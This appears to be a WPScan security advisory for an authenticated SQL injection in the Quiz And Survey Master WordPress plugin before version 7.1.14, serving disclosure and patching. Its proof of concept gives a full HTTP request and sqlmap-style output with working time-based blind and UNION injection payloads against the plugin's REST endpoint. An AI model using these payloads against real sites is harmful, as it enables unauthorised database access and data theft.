WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API

Description

While confirming https://wpscan.com/vulnerability/3b52b25c-82a1-41c7-83ac-92e244f7c5ab, another SQLi issue was identified and reported. The qsm_rest_get_bank_questions() function in the php/rest-api.php file did not property sanitise and escape the category parameter before using it in SQL statements passed to the get_row() and get_results() DB calls, allowing users with the edit_post capability (author+) to perform SQL injections.

Other SQLi issues were also identified by the WordPress plugin team

Proof of Concept

GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]


---
Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 

Affects Plugins

quiz-master-next
Fixed in version 7.1.14

References

URL
https://plugins.trac.wordpress.org/changeset/2503364/quiz-master-next

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
ee90f784-f17b-4268-9443-8f29e58d2ee1

Timeline

Publicly Published

2021-03-26 (about 2 years ago)

Added

2021-03-26 (about 2 years ago)

Last Updated

2021-03-26 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us